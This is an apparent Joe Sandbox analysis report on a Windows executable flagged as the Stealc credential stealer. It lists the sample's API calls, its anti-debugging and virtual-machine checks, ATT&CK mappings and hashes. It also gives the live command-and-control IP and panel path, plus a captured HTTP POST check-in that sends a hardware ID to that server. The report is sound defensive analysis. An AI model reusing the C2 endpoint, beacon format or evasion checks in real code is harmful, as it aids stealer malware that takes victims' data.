Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F1DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00F1DB80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F24B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F24B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F23B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00F23B00
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F1BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00F1BE40
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F1EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00F1EE20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F1DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F1DF10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F11160 GetSystemInfo,ExitProcess,0_2_00F11160
Source: file.exe, file.exe, 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1731587725.0000000001DB2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1731587725.0000000001DE3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware2,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36206)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36203)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36224)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36217)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36090)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36257)
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F14610 VirtualProtect ?,00000004,00000100,00000000 | 0_2_00F14610
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F29BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00F29BB0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F29AA0 mov eax, dword ptr fs:[00000030h] | 0_2_00F29AA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F27690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA | 0_2_00F27690
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 4460, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F29790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00F29790
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F298E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle | 0_2_00F298E0
Source: file.exe, file.exe, 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F575A8 cpuid | 0_2_00F575A8
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_00F27D20
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F26BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess | 0_2_00F26BC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F279E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00F279E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F27BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_00F27BC0

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1690239015.0000000005960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 4460, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1690239015.0000000005960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 4460, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 12 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 4 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 334 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML
No Antivirus matches

Source | Detection | Scanner | Label | Link
https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe
No contacted domains info

Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/6c4adf523b719729.php | true | | unknown
http://185.215.113.206/ | true | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/6c4adf523b719729.phpa | file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.php/b | file.exe, 00000000.00000002.1731587725.0000000001DD3000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/wKL | file.exe, 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.206/6c4adf523b719729.phpZ | file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/ws | file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.php% | file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/w | file.exe, 00000000.00000002.1731587725.0000000001DD3000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1544998
Start date and time: 2024-10-30 00:19:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 9s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 1
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 20
• Number of non-executed functions: 127
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
No simulations

Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
No context

Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, LummaC Stealer | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, LummaC Stealer | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
No context
No created / dropped files found

Static File Info

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.956685175501958
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 2'133'504 bytes
MD5: b2d5f7c5a51b55bfe094dbe2a60da2e3
SHA1: ace802a1a1b603e5361c2f3a2b4b5361b3358186
SHA256: a117df022325ff641b44e0d81f794e83d259764a0c82e52edb471a89b3f75370
SHA512: c57ea51400c2fb4ab89124160c6321bb597534777c873809ba677b6391d11fabf868889088c742159b148b987d500b3f8d76c8b9a9e604b272d6504c5918f580
SSDEEP: 49152:DfcqjHOH/2vzt7Z7LAGil2KwMFsHD9LKOsFOorhpzMsT:Dfcq7OHevzs2LKOs/rh2sT
TLSH: 94A5332C5FC02D6CDCC1DCBB037FD2285E913505C99B939018F519AC9E5AEEFA289D4A
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
Icon Hash: 90cececece8e8eb0
Entrypoint: 0xb29000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Entrypoint Preview (Instruction): jmp 00007F0F04500E0Ah
Programming Language:
• [C++] VS2010 build 30319
• [ASM] VS2010 build 30319
• [ C ] VS2010 build 30319
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [LNK] VS2010 build 30319
Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e9050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e91f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x2e7000 | 0x67600 | 3f006112543b1c2d59371746a229de7f | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2e8000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x2e9000 | 0x1000 | 0x200 | 049071433b9f7c843453337b0fd53002 | False | 0.1328125 | data | 0.8946074494647072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x2ea000 | 0x2a0000 | 0x200 | d7a936f7f78d3ebf1651dcc2815ab599 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
yhvanrkb | 0x58a000 | 0x19e000 | 0x19dc00 | 003414d6e73f6bb6460bc14b7dda9494 | False | 0.994987962613293 | data | 7.953026815598935 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
owhwljin | 0x728000 | 0x1000 | 0x600 | 9b6084580e4856287a09ec061279715c | False | 0.5846354166666666 | data | 5.148307749858914 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x729000 | 0x3000 | 0x2200 | b476734633d269146354712d8b289408 | False | 0.006318933823529412 | DOS executable (COM) | 0.01934167681976598 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL | Import
kernel32.dll | lstrcpy
Network Behavior: Snort IDS Alerts

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-30T00:20:03.381251+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP
TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 30, 2024 00:20:01.898471117 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 30, 2024 00:20:02.163310051 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 30, 2024 00:20:02.163435936 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 30, 2024 00:20:02.163687944 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 30, 2024 00:20:02.171473026 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 30, 2024 00:20:03.083554983 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 30, 2024 00:20:03.083625078 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 30, 2024 00:20:03.099121094 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 30, 2024 00:20:03.104547024 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 30, 2024 00:20:03.381170988 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 30, 2024 00:20:03.381251097 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 30, 2024 00:20:05.396298885 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206

HTTP Request Dependency Graph
• 185.215.113.206
HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | 4460 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 00:20:02.163687944 CET | 90 | OUT | GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache
Oct 30, 2024 00:20:03.083554983 CET | 203 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 23:20:02 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Oct 30, 2024 00:20:03.099121094 CET | 413 | OUT | POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHC
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii (multipart body, line breaks restored from the CRLFs in the raw capture):
------KJKJJEGIDBGIDGCBAFHC
Content-Disposition: form-data; name="hwid"

A12B30462FB12518020777
------KJKJJEGIDBGIDGCBAFHC
Content-Disposition: form-data; name="build"

tale
------KJKJJEGIDBGIDGCBAFHC--
Oct 30, 2024 00:20:03.381170988 CET | 210 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 23:20:03 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Ascii: YmxvY2s=


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Target ID:0
                                    Start time:19:19:58
                                    Start date:29/10/2024
                                    Path:C:\Users\user\Desktop\file.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                    Imagebase:0xf10000
                                    File size:2'133'504 bytes
                                    MD5 hash:B2D5F7C5A51B55BFE094DBE2A60DA2E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1690239015.0000000005960000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true


                                      Execution Graph

                                      Execution Coverage:3.2%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:3.5%
                                      Total number of Nodes:1330
                                      Total number of Limit Nodes:24
                                      execution_graph: node and edge data of the interactive execution graph viewer (root node f26c90). API calls visible along the graphed paths include OpenEventA/CreateEventA with CloseHandle and Sleep, GetSystemTime and SystemTimeToFileTime, GetSystemInfo, VirtualAllocExNuma and VirtualAlloc/VirtualFree, GlobalMemoryStatusEx, GetUserDefaultLangID followed by several ExitProcess branches, GetUserNameA and GetComputerNameA via GetProcessHeap/RtlAllocateHeap, GetPEB, repeated LoadLibraryA/GetProcAddress resolution, VirtualProtect, GetWindowsDirectoryA, and many lstrcpy/lstrcat/lstrlen/StrCmpCA string operations.
f2a654 9 API calls 37149->37151 37152 f2a72f 37149->37152 37150->37149 37151->37152 37153 f2a7b2 37152->37153 37154 f2a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37152->37154 37155 f2a7bb GetProcAddress GetProcAddress 37153->37155 37156 f2a7ec 37153->37156 37154->37153 37155->37156 37157 f2a825 37156->37157 37158 f2a7f5 GetProcAddress GetProcAddress 37156->37158 37159 f2a922 37157->37159 37160 f2a832 10 API calls 37157->37160 37158->37157 37161 f2a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37159->37161 37162 f2a98d 37159->37162 37160->37159 37161->37162 37163 f2a996 GetProcAddress 37162->37163 37164 f2a9ae 37162->37164 37163->37164 37165 f2a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37164->37165 37166 f25ef3 37164->37166 37165->37166 37167 f11590 37166->37167 37437 f116b0 37167->37437 37170 f2aab0 lstrcpy 37171 f115b5 37170->37171 37172 f2aab0 lstrcpy 37171->37172 37173 f115c7 37172->37173 37174 f2aab0 lstrcpy 37173->37174 37175 f115d9 37174->37175 37176 f2aab0 lstrcpy 37175->37176 37177 f11663 37176->37177 37178 f25760 37177->37178 37179 f25771 37178->37179 37180 f2ab30 2 API calls 37179->37180 37181 f2577e 37180->37181 37182 f2ab30 2 API calls 37181->37182 37183 f2578b 37182->37183 37184 f2ab30 2 API calls 37183->37184 37185 f25798 37184->37185 37186 f2aa50 lstrcpy 37185->37186 37187 f257a5 37186->37187 37188 f2aa50 lstrcpy 37187->37188 37189 f257b2 37188->37189 37190 f2aa50 lstrcpy 37189->37190 37191 f257bf 37190->37191 37192 f2aa50 lstrcpy 37191->37192 37232 f257cc 37192->37232 37193 f25510 25 API calls 37193->37232 37194 f25440 20 API calls 37194->37232 37195 f25893 StrCmpCA 37195->37232 37196 f258f0 StrCmpCA 37197 f25a2c 37196->37197 37196->37232 37198 f2abb0 lstrcpy 37197->37198 37199 f25a38 37198->37199 37200 f2ab30 2 API calls 37199->37200 37203 f25a46 37200->37203 37201 f2aa50 lstrcpy 37201->37232 37202 f2ab30 lstrlen lstrcpy 37202->37232 37205 f2ab30 2 API calls 37203->37205 
